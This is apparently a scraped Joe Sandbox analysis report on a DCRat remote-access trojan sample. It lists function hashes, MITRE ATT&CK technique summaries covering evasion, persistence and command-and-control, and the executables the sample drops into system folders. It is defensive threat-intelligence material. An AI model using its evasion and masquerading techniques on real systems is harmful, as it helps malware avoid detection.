Opcode Fuzzy Hash: a3cd6fb8fbe5975779b974b6ead382f515d621c952539b810ce2c7c58a4a22fa
Instruction Fuzzy Hash: B7011770E1961E8FDB18EF98C490AFDB3F1FB58701F104269E015A72A5CE38AA41CF84

Function 00007FFD9B760608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.4152607728.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1aa8fcdc445d2763d478e983e8507f58660b8d0e175f0bf1822ab60d48d0b5c
Instruction ID: eaed6aa92ca17a7fe8bec531b19b4f16256468af19ff24d3d5b76c339ef94ae6
Opcode Fuzzy Hash: d1aa8fcdc445d2763d478e983e8507f58660b8d0e175f0bf1822ab60d48d0b5c
Instruction Fuzzy Hash: F9018130A1960ECFEB9DEBA4C468AB973A0FF18305F51097ED41ED61F5DE35A650CA01

Function 00007FFD9B760610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.4152607728.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5877e5c066b5187d1124fbe8a335c49ab6a34bd995ca9d123f6cfe70175225
Instruction ID: 9968c028a12b094dbab461df0301ec1dbf8096678b62e0799644ebbd74578ecc
Opcode Fuzzy Hash: 7d5877e5c066b5187d1124fbe8a335c49ab6a34bd995ca9d123f6cfe70175225
Instruction Fuzzy Hash: 98018630A1560EDEDB9CEBA4C468AB973A0FF18305F51097ED41EC21F5DE35A550CB11

Function 00007FFD9B8B2CDA Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.4154033173.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9b8b0000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e9a4fce72db7a4221e083bef210096cd0157e5b6d27d9b6690312cea087e3ef
Instruction ID: 2c6573c875e5cca0e469757a649cae1337d83a8baf6c3d7c0c851e15a5dc6927
Opcode Fuzzy Hash: 8e9a4fce72db7a4221e083bef210096cd0157e5b6d27d9b6690312cea087e3ef
Instruction Fuzzy Hash: 0E01A230A1650E8EEB59EFB4D0685BA7BE0FF18305F5504BED40EC21A5DE35A654CA40

Function 00007FFD9B7605D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.4152607728.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21cbd5dec0091794ce0bc754288944422db12792383bd5441830e23eb8683adb
Instruction ID: 0a877e7e1b078253a68adba42d5856fb7c6c9065383292c2d4c30f9970ab2690
Opcode Fuzzy Hash: 21cbd5dec0091794ce0bc754288944422db12792383bd5441830e23eb8683adb
Instruction Fuzzy Hash: 36F0C830A0A64ECFEB54DF6494695FD3790EF55304F111579E40DC24F1DE35A550C741

Function 00007FFD9B7611B0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.4152607728.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f50e71791a24482d7e0edb1d281d42b40a03d1e267c26a76382e290a62a6fb2
Instruction ID: d8daa88f30c8b06f1b55197071a647b8f6d6ff247c9e35751c259988d8baedcb
Opcode Fuzzy Hash: 0f50e71791a24482d7e0edb1d281d42b40a03d1e267c26a76382e290a62a6fb2
Instruction Fuzzy Hash: DDF0AF30E1A64E8EEBA89BA4986C6BD76E0FB55304F41253AE41EC25F1EE6426208641

Function 00007FFD9B762719 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.4152607728.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03406019cf09d9c012b6afe8fd156e8f9a5bb9d9c1fb8cdd7dfd623081fe3b42
Instruction ID: 994035ec69256dbdb01cc4806c3eb67b5cafcf701379f44904835cfe3c6e17e3
Opcode Fuzzy Hash: 03406019cf09d9c012b6afe8fd156e8f9a5bb9d9c1fb8cdd7dfd623081fe3b42
Instruction Fuzzy Hash: 72F0C83190F38D8FDB9A9F6488255B97B70FF06300F4505BAD419C61F2DB38A514C741

Function 00007FFD9B76278D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.4152607728.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0625d80eb016c777841c80af77512371609394ad9f464bc4165cdc01b940d192
Instruction ID: 276fa78bcfb6b0e4919415abac6b89723c08112c69ed9b9154d8b8dc2dc6f8a6
Opcode Fuzzy Hash: 0625d80eb016c777841c80af77512371609394ad9f464bc4165cdc01b940d192
Instruction Fuzzy Hash: D0F0F630A0E78D8FDBAD9FB088255A93BA0FF05300F4105BED509C60F2DB389554CB01

Function 00007FFD9B760F6B Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.4152607728.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58bb917aa08622be85cdae89f00f612d412707a0faced1840b0da17dab327c07
Instruction ID: b49fe682e004face29b11a23163ad078b6ba8f9fa8bd58eb2085041f88733f28
Opcode Fuzzy Hash: 58bb917aa08622be85cdae89f00f612d412707a0faced1840b0da17dab327c07
Instruction Fuzzy Hash: D0F01D34A0A50DCEEB24DB44C8A0BED72F1FB58301F1142B6D00AA32A9DE356E408B41

Function 00007FFD9B8BBB00 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.4154033173.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9b8b0000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1edeec71cf1e521cc0b9aa620ae00bc0a4b4986c6d8df6b2a59ec91be81fe93b
Instruction ID: 66a361a1f701ea9eb134ef5190623904782199541f6d60c35b77ab45c0f516de
Opcode Fuzzy Hash: 1edeec71cf1e521cc0b9aa620ae00bc0a4b4986c6d8df6b2a59ec91be81fe93b
Instruction Fuzzy Hash: 61C01236A8482C8ECF00EAC8FC81CEDF378FF84310F000132D10DE3020CA60AA168B80

Function 00007FFD9B8B1D06 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.4154033173.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9b8b0000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e0d09bc237a395d460c2af3e94eb4dfa30a0044ddd9c3747387512f946d1c6
Instruction ID: 76f714e89322d6ee59cb5ad5afcaddff16b3af70ff4eda765abd1bc431ca3301
Opcode Fuzzy Hash: 29e0d09bc237a395d460c2af3e94eb4dfa30a0044ddd9c3747387512f946d1c6
Instruction Fuzzy Hash: 8AD0123031950E8FD758FE48CC999BA33A1FF58301B114124E809C3276CE30F9518BC0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LaRHzSijsq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe

C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\ee2ad38f3d4382

C:\Program Files\Common Files\microsoft shared\330defd625eedf

C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe

C:\Program Files\Windows Multimedia Platform\330defd625eedf

C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe

C:\Recovery\330defd625eedf

C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

C:\Users\Default\AppData\330defd625eedf

C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe

Windows Analysis Report
LaRHzSijsq.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre